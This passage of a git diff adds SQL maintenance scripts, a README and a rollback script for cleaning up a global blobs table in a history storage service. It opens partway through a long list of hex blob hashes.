('\xf95cfa29e6aee998d9459210de2d6eb85cb4ed02'), + ('\xf95edb74be83d96ea75807777a74c6ed1c885320'), + ('\xf9608689652811303604f3e53c2c6a89266a1ced'), + ('\xf9630f7988f9b7b636b848ec82b917e546f32fc6'), + ('\xf967892169825d80b0409a91c267a0533a2db3fa'), + ('\xf973e78df1149e17f3c52fc8dd07e893238148fa'), + ('\xf9773c7e0d8d31fd1ae6f963e3d53ace16d15dee'), + ('\xf97a2cc3fa1358a64b24f2abd3a5382e73d11c01'), + ('\xf97a5024a7350b8e821c15210c41fe5c7ddbf8fc'), + ('\xf97dbd0a7d8d09f5a692f247c7a560b95d1c3172'), + ('\xf986a1b16bc845322d5bbe95b08e82581d456b7a'), + ('\xf989f1b625d8358f255d4a93648a595880888dd4'), + ('\xf98c323d5b7844262fc60daf65d92e64f0fc8e02'), + ('\xf98f1e9e778ac27c03e514155098b250f926e916'), + ('\xf99718fbf7221d7fe8b51ad636446adaf4162081'), + ('\xf9a09e4a870cf174994b12c459173f10a8f35d1e'), + ('\xf9a0a6c547882c7d5561b9fcc990011d20905af7'), + ('\xf9a2b5911479470206b69628463c7df2c4a15bf4'), + ('\xf9a88a038e397668d370510e1e471cce0f3050a9'), + ('\xf9aae6efc45ac77d70766fffe3f4a5780e2d49d4'), + ('\xf9bf3cca18df5226892678df3d5c5d01cdb23bc8'), + ('\xf9c03d79f4fb8df4cd260e69258dbba3bb4dfd04'), + ('\xf9c13557bb1ef491e1441d581c5587743f0f06a4'), + ('\xf9c913e457d8147f1455d2e81fb97500a8c107f8'), + ('\xf9cbc54cb4002c8f6b60a76d35abfe47888bb503'), + ('\xf9cc355be8d14ae6fcca25e9c81078c70aa44b95'), + ('\xf9ce47b2cc7981bef247088b40498fc8257859b6'), + ('\xf9d6655bbb53cd75ee5d6eb88ef60432e92bffad'), + ('\xf9dfbbcde07a62657283a5c411c98a7768954c5e'), + 
('\xf9f2809d0c0363b117540a879892d8cb81709070'), + ('\xf9fa6516d918b655f5ae6c9bfd0140eea68fd04a'), + ('\xfa07ad9c8c7e45164aa11368dbb3877029eeabc0'), + ('\xfa184606f5024e5a0708bb345e3fec2e2a6f0d29'), + ('\xfa1bc780c28864508f3270163c91d3aff83eadcf'), + ('\xfa218203260e9253e40d06d02cc1760535f5e86d'), + ('\xfa223e401ab66829cba2716bafe2c465d1045e86'), + ('\xfa23ce12df127bc1810ff1fac2ced0e6e6d242aa'), + ('\xfa2779d58984b7d57509a2ca9ce37e206b0df01a'), + ('\xfa28d9c9744e5bc8c75eb125fd7de53fb7ab2ff3'), + ('\xfa29036b26996fba6a5b18c36d4e115bf4ec656a'), + ('\xfa2960fb023e9867067240df48521a120d27c06d'), + ('\xfa2d099b92db49914d2cc41a0f1f27dc83c42071'), + ('\xfa2d53fa28cfb24a24256937cce369681f0102bb'), + ('\xfa2ef515481682c04e498917182dba8ffb3fc90a'), + ('\xfa30f59cc4ff2e5058bae3e3a0b045b2c87d08e3'), + ('\xfa337cceb16c2bdfacd9e5eb73af4b214ef5de86'), + ('\xfa36066f7d231bfdd8d847187e5eeb66f6fa9807'), + ('\xfa3bd0d05530c3ff97d3e9fb57c7734191c9613a'), + ('\xfa3d658eaecf5942cde96d19e2060a1fe8d4db2d'), + ('\xfa3de079306d27d55fb6c04143e47dda71de91e7'), + ('\xfa4066c739647b88dcc1ed4108bdb8ba476bf3fd'), + ('\xfa410c0d5ca7e1c92ea4fb0bf67deca2b3403d5a'), + ('\xfa414aff9ed28262884309c66b0d1fb5de5be4ea'), + ('\xfa46b6f135bfa3848b451d284286beb04fffce89'), + ('\xfa47743ea3e79157b05ac0ab2911c4d00548bef5'), + ('\xfa4ddf02d4d5add020f229acde57502feca0d360'), + ('\xfa5273282a1df83716b11691a806318a8a858d97'), + ('\xfa54751181cc6e20002e98ae698b8afeebd6b49a'), + ('\xfa5e9ba0b884e38ea8f935af333b1829878317ee'), + ('\xfa6dc9ec0d427205e42f969b3a2543b4028da36d'), + ('\xfa6eb8db7387ea1a4eb09ce2469dc301404a0f4a'), + ('\xfa7426ac78790552b1d13f1844160e728bb30ddf'), + ('\xfa7e38f55ccf2d997424efb61cf73be75978362d'), + ('\xfa82ae4ee56e2a02b7a232f8d06b815f7d532181'), + ('\xfa850d32dee6f587db9020a1cf290848e3397256'), + ('\xfa855618673b9727bf6f136a167ffa217957dc85'), + ('\xfa8697e445092a3b089eb2e7b57c98ff8774e3e2'), + ('\xfa8814ffd064d172e9188c4b08ac60041c43a383'), + ('\xfa8ecac150c9d3bb55434bfa1e424b2aef33348f'), + ('\xfa8fdc48ddb4944b7156d8c1cda7ac160e69498f'), + ('\xfa9a22540c748efa706be9334e722d73f9e30248'), + ('\xfaaf9b6bf835c38e1be2aef070b8e9fb0112e42c'), + ('\xfab3da23f7ef14fcd7ae51580c7ec6c5644ebca1'), + ('\xfac3685a21aa5924e179575068a57f80f2d99362'), + ('\xfac47804a1c42ec58bbc79e633f7d80aab4b3b13'), + ('\xfaca23745260bb5ae8d57549b972335c2347c384'), + ('\xfad404b80b0abe636964aa59910649847f1212f6'), + ('\xfad46ce0d87e10a761e23a09c33b227663e2c3f7'), + ('\xfad71334e835b5c06b713b92f4e56e6aa6e4d835'), + ('\xfadd08fb986a24cca4efd9c740bdf2b079062a84'), + ('\xfadd274d2fb2781c6b8035d95fc76b6b7650338c'), + ('\xfade0c25452aadee0f7ebfcd296529acb6713329'), + ('\xfae517cbdb4383dd1e02ad701c475b8b0de52755'), + ('\xfae68d19253ccdef0a3e07f71782ba940e0ba894'), + ('\xfae6d34d3167f6ce5eb4000b96a68ab65a25a848'), + ('\xfaed7947f77f8a80bb0cfbec6d4463c1f79b8573'), + ('\xfaef62f4f2424c14dd24773d475d7618d3c6df0d'), + ('\xfafa599d7afe829aa3636ce45ce85a3eecf3fa0f'), + ('\xfafc6cae2e4a39d9db52c17c4cbd2a0fe43ac4d2'), + ('\xfafda954877d26605742564cfe8da7000b24bba8'), + ('\xfb023335c68c201184603b3ad914fd9e1ff016f1'), + ('\xfb055e109f32f76a08a1fc3513e87c2c51b9cb2b'), + ('\xfb0b70fdcd10b2ea0b356d9a25484ed04cc26634'), + ('\xfb0cc49f7fac6887844e0e0218bf602646870af7'), + ('\xfb0e70a7424333e0e450c05c9dee9734123c179b'), + ('\xfb0e7a08927e50b50fa0b36f4f589abb2caac94f'), + ('\xfb0f2b09ddfc4edc58bc1b787997cb184278e58d'), + ('\xfb144a470b453a91f7e3801291495ae1eb0eef5f'), + ('\xfb161c12060bc6be695868e2d6730a89f94acb2b'), + ('\xfb238404e5202d14258b2b8cbb2ce7d5fd7c58d3'), + 
('\xfb24be2437c954f79ac3c890b9e9a545735b2450'), + ('\xfb26bab044001d64aaff5b65e19d1f3b14ded93d'), + ('\xfb2b3afef9df55bd9f2c7db00f7b7505565fd945'), + ('\xfb35aafdd6866dfaa60120d93015f25cdcf7b4a2'), + ('\xfb48ffa0effebc746172d72bcd81c23556d0e187'), + ('\xfb4d5a6ec59045ee13a90d4114bad75a2a5c2f3b'), + ('\xfb5167c8f327ea366cf2b3e7f24e5e347eeabb76'), + ('\xfb5f0a0ec78bdd8b77c90db6f303ccd38c3c2450'), + ('\xfb5fdba4831353124c332fe5bc1d18e2ce7c398a'), + ('\xfb623d7af8bb32b35b6dbdfedb339094b18b2768'), + ('\xfb668b8f85e122899c56daf89252fa4cd779dba6'), + ('\xfb79ff8fb22b3847b5ce57af173571839cc9671e'), + ('\xfb80bc99b1f26320e289ff5ac79668c4d4142a1c'), + ('\xfb856fe520f03272b580a0206f7606b83d1f7991'), + ('\xfb8a51958fdff705aa629845769385883fd87740'), + ('\xfb8a6649021da64bc360c0f95d4d86915cf008f8'), + ('\xfb8c801ad5ee08efa722600f61c74a7e5990ad34'), + ('\xfb8d768811e36dceb08342f5a465d35f7b7d17fc'), + ('\xfb8f668a40bb0142eafda3747e22aac0fa6227c6'), + ('\xfb8fa9c9d0b978606d61cfa0a8fa20b99887b280'), + ('\xfba5ed9e766c27ab46af28dc3228bf684baac38d'), + ('\xfbab16a034a6bf6520aafc334bb1b2ddd4f95f41'), + ('\xfbaf21b4f2c8e7d031b0351879ecb6b114a95db6'), + ('\xfbb244580102850ef8a91d96eb8e82f7a3e0df6a'), + ('\xfbbac8edd767b05321f5c796cd6b2bee8e580a07'), + ('\xfbbf16a8c7f893522f0c574a7af97cc6bcb5d31e'), + ('\xfbc6978296623bb2b93f11786f4d62f577bbbc3e'), + ('\xfbcebb568c7146478a4a96c0299d78173ae2ae2c'), + ('\xfbd701269adef1d44de4980de03155ce7d4abfda'), + ('\xfbddeb6ab7d0dcd816c61f90fc274cd60164ea87'), + ('\xfbe39703611c0b7ecf1b31059002c0cab98c2218'), + ('\xfbe794c555ddad4ef46689b0aef47ed2b19c0cd0'), + ('\xfbe82014b8fcc293d82c2a203534af5d0eb89663'), + ('\xfbe96f813dcd6b3fc43af84d13c64f750b10b3db'), + ('\xfbec3ff0b645303d256caa0f4ab05e1fbf333488'), + ('\xfbed5e2de5ce34b1a9e861684694f7038349cee2'), + ('\xfbee99f99f0c636c9a9f1f16198bec73e1389b37'), + ('\xfbef958344acad987aa79f728b00bf083f6af16a'), + ('\xfbfb7caf4652f998ca258c2edade374d020f5cbe'), + ('\xfbfe8065e0ae6fa2bb998aa0f769ac154bbc5a2b'), + ('\xfbff51476ec003c890cb6c07c4de2b6e431dfd23'), + ('\xfc0b5a09498c08b75ef18dec4d1ef290f42c9da1'), + ('\xfc12259931816b096ed9ad4f9e650a224da2a4ad'), + ('\xfc209ad9c860c95ff8949ddbcca4a5d2705c4ab7'), + ('\xfc218358b8305f0f857bd2684999fcd00f60f900'), + ('\xfc264303f2d3f1538103396f57b1dabe17ebf7d0'), + ('\xfc27eb2378e5ec73a38b414f1a2db0ae066dcd82'), + ('\xfc2b20bde48237a054d654ec025a43a68f28925b'), + ('\xfc2d442044b9a51c416701abc1c4cf9398f7a8aa'), + ('\xfc3946d3dd3eb828e86cddb9b5851435978a509f'), + ('\xfc3b9b80a90790a54ba233f5eaced3f138ea1269'), + ('\xfc48397e3f06a283bcff65789cb2e0b3c7747070'), + ('\xfc49294e18d34e79cbf68f3f1a178d66edfd150b'), + ('\xfc5395fde93fe761bd2c4c8fb1f14dd45858fef1'), + ('\xfc54a84b51bc847b582540bd549af8acb5ffa996'), + ('\xfc5e2a4d90038d20145f061a120b54b369b7314a'), + ('\xfc6b7028c730b27f0b9e4654e0b617de7bf31c68'), + ('\xfc6ca7d49e92085dacd3a54c8363739f24e48a71'), + ('\xfc6d804ead600b456fe16c873b645e374d27f659'), + ('\xfc750008def11553fe4444d9787b6281c78b9ca0'), + ('\xfc78fe7ccb9277d7099881c68e3c2fd66c53bc8a'), + ('\xfc7f3f2826429dcc9723327b44f3f9c374ed2e24'), + ('\xfc808cc9b84642c0e1e4686d5ea73e7b982ee312'), + ('\xfc86bfcec68726c47827a854fda0ddbc3bea56d6'), + ('\xfc875e7ef2ebf605465cd80c1999e4f1c3efd217'), + ('\xfc8841e6386eea3630144b9512e5e45b8663f5ae'), + ('\xfc888dbc27c00a4bd80b595c85707c1b6c1b90e7'), + ('\xfc89b4f955ba74cd9634f54b3fc749d3fd4bf1c7'), + ('\xfc8c0bd2f9ea3a25e35ec7fe71a23aa5688edc8f'), + ('\xfc8d6090ed817d6c0f6351442e2cb8d9d157bd6d'), + ('\xfc8ec43c86340714f6eed800563b5a9ee45f90f0'), + 
('\xfc9603cdd682c014b99a944af73dc370dfa2e530'), + ('\xfc97a52864a47c2520b5d1a42d2273f7a5749d13'), + ('\xfc97c5e550cfeea11196445d6c8bb067f8cc08b9'), + ('\xfc9d2364b8699ad76bbf746bcbba1b69f3c0d092'), + ('\xfca966ac658b423176d783d3928494a9471d30da'), + ('\xfcace38a07707c1365e0f0999003d900441089b8'), + ('\xfcaedccc469dd5c39b020e7d10041270290554d3'), + ('\xfcb0be4fa08dd02e4f8d0a033edbfa8c7c0d9576'), + ('\xfcb320b404d93dd9d7e81d1535971d7585066f0c'), + ('\xfcb3d89b68f68ba561ffa4ce70779b528e56c3ad'), + ('\xfcb9e8ca3851f81174a33d44e7a1171135b36e06'), + ('\xfcba96d8253749cc4f027aab0330b20111c962ba'), + ('\xfcce052bc032853982c6150d68adf2b7f900171a'), + ('\xfccf9fe4741baf1fc44e7b6de42c5ab72b119fb1'), + ('\xfcd6a20c23f0c6bee2d1d06f3791ebe2c6e498c5'), + ('\xfcdda8bc334772f445ec93f3c3ece0249ebdad42'), + ('\xfce7b4314c81c0e7b630f6aee4fd97aa5c91ab17'), + ('\xfcede865644795a0f9fe77f320f1c4ec593e6031'), + ('\xfcef647804b9480145a1689a90f0a569acc7105f'), + ('\xfcf0c34ced8cf8fd0ac030c8a5f05d3c61265f67'), + ('\xfcf88ff03dbc262883b11a81fc52bfa437f8725b'), + ('\xfcfa7caf02dcd462fcfb25aa2831afae3d448930'), + ('\xfcfffc1caf5295c4137e3d91de8dae8c65b3872d'), + ('\xfd032ed2583842df2b8c29e7823f6becadfdd5ff'), + ('\xfd057983d788719499bf93702f37e237eef5461d'), + ('\xfd08936e5dc4fc7e38dcbdd8751fd9ad595ecdfc'), + ('\xfd0d4bb214efb086ccb02161e2302ff06ec33893'), + ('\xfd14e842981ef5ff8de7d0b46189b83519f2a391'), + ('\xfd18f999ac8983aa789e9942d80110e88c12a8a5'), + ('\xfd24e0dc0ee504fa73fefe097054edff5bd046a8'), + ('\xfd26b47dbca72dcc604117a7c5011c098f43f757'), + ('\xfd32b0180808cab9cd0bb420f68b2239212c2b2d'), + ('\xfd3343a215a5d3203f1d8439573500b54fb27cc7'), + ('\xfd3a86fbdb2df9f54b3e230665e025a44c8fca41'), + ('\xfd40910d9e70d6412e5e9919bb62a2d649c27a7c'), + ('\xfd41bcf1c4cba814a89bd45b4f5cb814c1d4a70f'), + ('\xfd503493bb4284218c7260d2991259192cfb4bc7'), + ('\xfd58180683f6011b3e6f0af1ebf2ca6be1ca9d5f'), + ('\xfd5e3a48b0aae16b2c057f83a216a86d82170a6d'), + ('\xfd650c0454608742b00510e46d29df17cb2b582d'), + ('\xfd6c906ce15baa7b94f3f82c9245fa9608400d9a'), + ('\xfd70195fb5208e16eb05c2ac1f9260346675fb6e'), + ('\xfd77259724176d78610a6b867cbd8f42ef8a4067'), + ('\xfd79d43bea0293ac1b20e8aca1142627983d2c07'), + ('\xfd7a2d4cb7b7e7c53b55395919a211f78a566800'), + ('\xfd7e23a6d6ce16ee1a872fd9cc1bcc3a9778114f'), + ('\xfd7f850160fbdf73535ddf72ed642ad8b50f2e2c'), + ('\xfd819c4ce8bc9c80dea58467e877dc22070d7d9a'), + ('\xfd85c8d3f6c403421bada2eafa3f8c10f019d3cb'), + ('\xfd88725e98546ad618d5b26dfea81c34471fec25'), + ('\xfd8c3fd200d1fbdc18c992da966fe8ca01154098'), + ('\xfd8d3d189da29404771945c838282c08ccd51d38'), + ('\xfd8de03f807d4713e32c85c5b93d076984bdd4d6'), + ('\xfd9f797efa1524fd1cd5ca58dfd7d21b7c74b7e9'), + ('\xfda34ba5c2e71f0e2b52fde3e31b1254e6757f55'), + ('\xfdac615cdcb1395e9682d25454f27a5e6888fb2b'), + ('\xfdb0d624982d55a6d19c76307b373d6b72001cf8'), + ('\xfdb5f182ef4662610898edf09be15cfa85933e50'), + ('\xfdb885c3f75a361a0c07cf7287589a417a6244d3'), + ('\xfdba81b2f6e3599c5bb95a4fcb8cde478107aeb4'), + ('\xfdc4390580d60f7f65b709aa98b14d82445036d6'), + ('\xfdc59088e656c5b819b25af675dd0ece2373e511'), + ('\xfdca20bc0ba96d6724a08128117556b69af9f0ee'), + ('\xfdca7368dfc0685e8b52dad07a5cb282d234df54'), + ('\xfdcd90ec1fa6382a3bb00bc429af19ad3167cb1b'), + ('\xfdd032e7394cde732ea28e5145e274c289818969'), + ('\xfdd186c911418fda7caa23fec95ed3cd3c3e376d'), + ('\xfdda2f6662fdbf450e068dfeac8b57cc331767c5'), + ('\xfde50a172d973a3f3fc3ed0e6451a51735d23b44'), + ('\xfde99c77df81d50958d490865f7d31db430d52dd'), + ('\xfdea407bcfdf9851e5c94abeb12a2e8c2ea56ad9'), + 
('\xfdfc23542f47a51819fd528d6ff32aaeac727ffc'), + ('\xfe0351e1a7111ec6778457dd613667041983bda5'), + ('\xfe0573d73bb16a701faf7fa95e5d21fc32c0b26b'), + ('\xfe07abdce1d799f700b372f12bf6ade37b9a2c4b'), + ('\xfe08a67cd49122c4da6b2ca2c9bd307de45fcee8'), + ('\xfe121990e0c54be2fd07588456d4a1fccbfdb647'), + ('\xfe13bedc364e63671a670f19df865d516f978541'), + ('\xfe15142de620f3e8b07dd766958680fbe2204041'), + ('\xfe166ab4952c9ac02d64c3b58b919e6fe4a2b1a9'), + ('\xfe16c1b2cf3e6ae0485c95addf6a6eb331a731c1'), + ('\xfe1e8e0674662570dcd92fc1e7ae16e8edb311f5'), + ('\xfe1fe8b3e20c1be5a4892b751b9268d693db543b'), + ('\xfe298c97e6bf610ca71d053e55bc44a35104169e'), + ('\xfe2beaa4b8e8eecde1f9e583da6ec1586f31e00e'), + ('\xfe2f194a68361ad610a280cb4a4af7c95d76cfe8'), + ('\xfe2ff0457e95fed12b1c64a73e919cc6c39402c2'), + ('\xfe327111d434771049d639474ada0120eeb1c5de'), + ('\xfe33194987d6a0c93b353ca1f440aafda1513845'), + ('\xfe388e59e29a8c5ea2240a6aef2a59c7b7d35731'), + ('\xfe3fd56d7cf370906f78645fcd68a4ba263e2d28'), + ('\xfe4374fe3cb326d9b0b4bcdb5a9227e55dd4de4c'), + ('\xfe4747b483c23ece3c8f78b93f5ecac0f027c6b5'), + ('\xfe48098734a8223ec79b5ad2f42702c1cbfefa6a'), + ('\xfe4bbad1c6030ed3fca2c7336897087060b21b5a'), + ('\xfe50835e2eaf9f90cb8f52fc5ef2b73045b07a03'), + ('\xfe53ac13ce3f6f55d29d7bf166368fe00dbcc6f0'), + ('\xfe540839ed1e171f3a417b46389257c416f524f1'), + ('\xfe54955d48006649517f57356a552c80a7832119'), + ('\xfe56f57c09ca694dd4a4750055439442d774ab99'), + ('\xfe57aa5560b0d5e74a5ecb750e5956d230a5aa3a'), + ('\xfe57b501307e314d0ce7bb40955c16df2c3c40c8'), + ('\xfe593561f142fbee2603d16d4bad68160643b27b'), + ('\xfe5d9fb72e5b3d01bd1b01d7d0ebb8ace3ff3a2b'), + ('\xfe60b87e7b0cad4703cdf8de7c89cba0649d3981'), + ('\xfe6621ea61de3dae462e32400f07479b2c7f78e0'), + ('\xfe755267c2e61133df01928c38bc55fdccac54bc'), + ('\xfe77766fb1b36a66dd9a7be198789f3532146a64'), + ('\xfe79f8e1a53a1c7a830a67c0c5b7f4169cde79e9'), + ('\xfe81cb7e1af2a884527d16d3e118cf519d976fdc'), + ('\xfe886ec304d3097d946da9ec771c42e121261077'), + ('\xfe8a22af76b792aa7553451be559e9d74de8a5cb'), + ('\xfe8dc5abd36f373e26b90f3da71b35031f71ae54'), + ('\xfe9b63b81e2d069b2316dec4fe212024c89af885'), + ('\xfe9c352c92b4be37689453460fc7bff4540455e3'), + ('\xfe9d102870f9c95d4f545d6ab5025c2cc6ae51d3'), + ('\xfeb602094c3f751bd27e52301c540eaa9db5a05a'), + ('\xfeb9eca9a76d80a41602a17b9961e28abb6068e7'), + ('\xfebc801044d1bec2ca1bdcfc11ff252e72c49993'), + ('\xfebe4e3ea21c6d267afdb3dc7a40d30ac1f92676'), + ('\xfebf5e1fc868d3022126b85da00e759faaf3224a'), + ('\xfec1f8aba1529284e7b50fcd044d5b9d522b7652'), + ('\xfed885fa9c171c97ba3a6dea934eb24ab5626a10'), + ('\xfed8f37013c337e7640b101af0dc3b7afd519807'), + ('\xfeda714160591877eaafa9a8e3f69cc563e9f067'), + ('\xfee375bda1586d0ef2356540b356540d5ae99367'), + ('\xfeea6930b2dbee316039355cf7d377d344b9aad6'), + ('\xfeebdb85efb0049c35028d631b8c98f9dbe3fe1e'), + ('\xfeee739b9a0d27d4d0ae2bdb6d4f31cbef5e342d'), + ('\xfef2f3fe75120a3f21b1deeed4169529f41dbf30'), + ('\xfef43c366c2382f3f30ea362d60e30c9f1c30e97'), + ('\xfefdd8250dfec84bf4c5a30f37cd19e6d18e194a'), + ('\xfefffa6b0b23b1c6777af7012b324b291b77d863'), + ('\xff010d65d1a58ee614e88e2dd35a203d0795858a'), + ('\xff0815cd8c64b0a245ec780eb8d21867509155b5'), + ('\xff08ee48996bee00d1163c184fd2dc0b6ff13e2c'), + ('\xff0d0b91b6ef41468c593a0ca40a81f9a183b055'), + ('\xff11093139174a1e2b1c41da1bf7a8505964dbcb'), + ('\xff13b45fa7ce2836ce8419e230b6b5fbfb078337'), + ('\xff1504bbd2e44c8dfccabcd3445961705f5fd684'), + ('\xff1889977f761701a512247ca1559a69daa3feb2'), + ('\xff18b45594b80decf9efbb45f3d3a600d17a8956'), + 
('\xff1ef9fc6f71a198fb323d1df22a581fd1e92660'), + ('\xff2656731c0c8bbb645c4b46b418a9e64c6fd0e0'), + ('\xff27fc8f374780aefeae594c08478a0786167905'), + ('\xff29a7b0f224e6eed27c9254ce5d72897ccf7775'), + ('\xff2e5014510b80cee4e11deb59c66a405006d346'), + ('\xff2eace3e8dc2d207d633fd5b33832ddbfd53d7f'), + ('\xff318a2729cbbf811f18feaccc947c7b0208ec3b'), + ('\xff3194977cda5e96e0c47f4d0d4ef5aef95c0931'), + ('\xff3715aa5056a7195fa73e4948a79b56a03cc26c'), + ('\xff3bb2352b957585b55fe766d3bd0cfcd7b2e056'), + ('\xff400a527effb5757e8986f85398518f6b6450a7'), + ('\xff406407faf7cfc332f7ee664e9e125459912219'), + ('\xff416336a4130eb31fdbb6a4f09ce1ea3389105f'), + ('\xff4341975ae6af5896c4a3446c4008be289edc72'), + ('\xff44369da8682cc96e2d943984e24a7c0efa34a0'), + ('\xff4e760779acccf9f521ca976e20dac50269175c'), + ('\xff54e94130e739f7ba4301fbcf8351590c796a09'), + ('\xff5ec4cba4a353bff8fa2791b7e3a12e457c0811'), + ('\xff62497246cb20f0cf766cf21869bd6926067403'), + ('\xff62edc7b94d88157c62b78fd8d89823b70068b0'), + ('\xff644fd611b080a3c57a854e168557ac466adf7f'), + ('\xff6f9d0f1a38e233998d74122c66ab5c5faed4fe'), + ('\xff700e0077e965b05297e573d414f6f571ae9dc7'), + ('\xff707ddc8ec89bc0b1df4b1f9eef665f63dd442c'), + ('\xff732246f081d4294a5af53ef7a9800c4ca903d2'), + ('\xff732f4e2af57264d7b4c2446607e76f88853363'), + ('\xff79d8b01ca3bf289299d125d0b01be2cec5b9b8'), + ('\xff7a583bad77ccc7a562f0402cf10a24e7c9f4b1'), + ('\xff7b56d38098cc769fe87634c91b84481baece41'), + ('\xff80737d101ccbe09d45a0b7f3cf0241f2f68885'), + ('\xff8435690d4ef628e792d4b3d69f2c21edac1482'), + ('\xff8541f97df3a64cff34a49b493bdecbeb5ad82a'), + ('\xff8755fd7932512e7cbd281bfc137acf2fd90db7'), + ('\xff878c1cfe0a35786c8ab92b99d69e378bc31172'), + ('\xff8e5f977765da43163875788ba02be6a8de7975'), + ('\xff8fb252855f6befaa6fe7b5d61ebca59f260f53'), + ('\xff94c189d199a205f6651409fea994cb8037f9b8'), + ('\xff999b4fc934e4c85e429e110df1debb5677edfc'), + ('\xff9b58b0994ff60b3cf0403aa6a93587202444d8'), + ('\xff9c6a82062f0878be0afb4bf29124521fba8b06'), + ('\xff9fa84f51299c6ca35ca29b9538237120be16b7'), + ('\xffaf6cfa891872cf3ef83e40497f6bf5c7ba70db'), + ('\xffb737cfc18b11cf3b997ad15e553531f1f2f0bc'), + ('\xffb8e77fdf9898b503322015cbd9c3cdbd554568'), + ('\xffbbefbad0ab1dd802534eae62ed5aed1d854f2b'), + ('\xffc31725607d78e99b124e5dccd6b99600fbba3c'), + ('\xffc74bb90ebbf9cc843c3a1c4ce7efa84f154600'), + ('\xffc78ab8bf4b2e88869c1442add3769825b2115b'), + ('\xffce29b962fc0d2c2d400ff2d05fb996bcd1fce8'), + ('\xffd19832e5644d4482b1b2d53fdb3811ffac048c'), + ('\xffd7488e244897b0086fb7e6aa43fbd7d04e3c3c'), + ('\xffdd5670d67c4f5d244a0fd6e8cff913e9cb0b26'), + ('\xffde637ceff0bbbcb8a8e7cf30e4bff0f0e82300'), + ('\xffe7b29deba65d44b9126ffe33300b6038de765e'), + ('\xffe89720a22a747c9c6020b5fe85f496c224279a'), + ('\xffe93a1686957595fcc83f309026324290093032'), + ('\xffe9d8a251a403ecc1b29c29985a2f38a4c424dc'), + ('\xfffdbafeb73c497ea3d84107162ba05e829c59ef'), + ('\xfffe608c967afafbdd7be93b6d7704a2754864fc'); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql new file mode 100644 index 0000000..577fcb5 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql @@ -0,0 +1,3 @@ +UPDATE blobs +SET global = TRUE +WHERE hash_bytes IN (SELECT hash_bytes FROM global_blob_hashes); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql 
b/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql new file mode 100644 index 0000000..9e708ea --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql @@ -0,0 +1,16 @@ +CREATE TABLE global_blobs ( + hash_bytes bytea NOT NULL, + byte_length integer NOT NULL, + string_length integer, + global boolean, + CONSTRAINT global_blobs_pkey PRIMARY KEY (hash_bytes), + CONSTRAINT global_blobs_byte_length_non_negative + CHECK (byte_length >= 0), + CONSTRAINT global_blobs_string_length_non_negative + CHECK (string_length IS NULL OR string_length >= 0) +); + +INSERT INTO global_blobs (hash_bytes, byte_length, string_length, global) +SELECT hash_bytes, byte_length, string_length, true +FROM blobs +WHERE hash_bytes IN (SELECT hash_bytes FROM global_blob_hashes); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql new file mode 100644 index 0000000..8ceabd8 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql @@ -0,0 +1,22 @@ +BEGIN; + ALTER TABLE blobs RENAME TO old_blobs; + ALTER TABLE global_blobs RENAME TO blobs; + + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_pkey TO old_blobs_pkey; + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_byte_length_non_negative + TO old_blobs_byte_length_non_negative; + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_string_length_non_negative + TO old_blobs_string_length_non_negative; + + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_pkey TO blobs_pkey; + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_byte_length_non_negative + TO blobs_byte_length_non_negative; + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_string_length_non_negative + TO blobs_string_length_non_negative; +COMMIT; diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md b/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md new file mode 100644 index 0000000..7460d4d --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md @@ -0,0 +1,9 @@ +Scripts in this directory were used when we cleaned up the global blobs table, +ensuring that it only contained global blobs. The scripts are meant to be run in this order: + +* `01-create-blob-hashes-table.sql` +* `02-set-global-flag.sql` +* `03-create-global-blobs-table.sql` +* `04-swap-global-blob-tables.sql` + +The `rollback.sql` script can be run to reverse the effect of `04-swap-global-blob-tables.sql`.
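Note: the cleanup scripts above are plain SQL files, so any Postgres client can drive them. A minimal sketch of running them in order from Node, assuming `psql` is on the PATH and connection settings come from the standard `PG*` environment variables (the file names are the ones listed in the README):

const { execFileSync } = require('node:child_process')

const scripts = [
  '01-create-blob-hashes-table.sql',
  '02-set-global-flag.sql',
  '03-create-global-blobs-table.sql',
  '04-swap-global-blob-tables.sql',
]

for (const script of scripts) {
  // ON_ERROR_STOP makes psql exit non-zero on the first failing statement,
  // which throws here and aborts the remaining steps.
  execFileSync('psql', ['--set', 'ON_ERROR_STOP=1', '--file', script], {
    stdio: 'inherit',
  })
}

Because `04-swap-global-blob-tables.sql` performs all of its renames inside a single transaction, the table swap appears atomic to concurrent readers.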
diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql new file mode 100644 index 0000000..c8d5e8f --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql @@ -0,0 +1,22 @@ +BEGIN; + ALTER TABLE blobs RENAME TO global_blobs; + ALTER TABLE old_blobs RENAME TO blobs; + + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_pkey TO global_blobs_pkey; + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_byte_length_non_negative + TO global_blobs_byte_length_non_negative; + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_string_length_non_negative + TO global_blobs_string_length_non_negative; + + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_pkey TO blobs_pkey; + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_byte_length_non_negative + TO blobs_byte_length_non_negative; + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_string_length_non_negative + TO blobs_string_length_non_negative; +COMMIT; diff --git 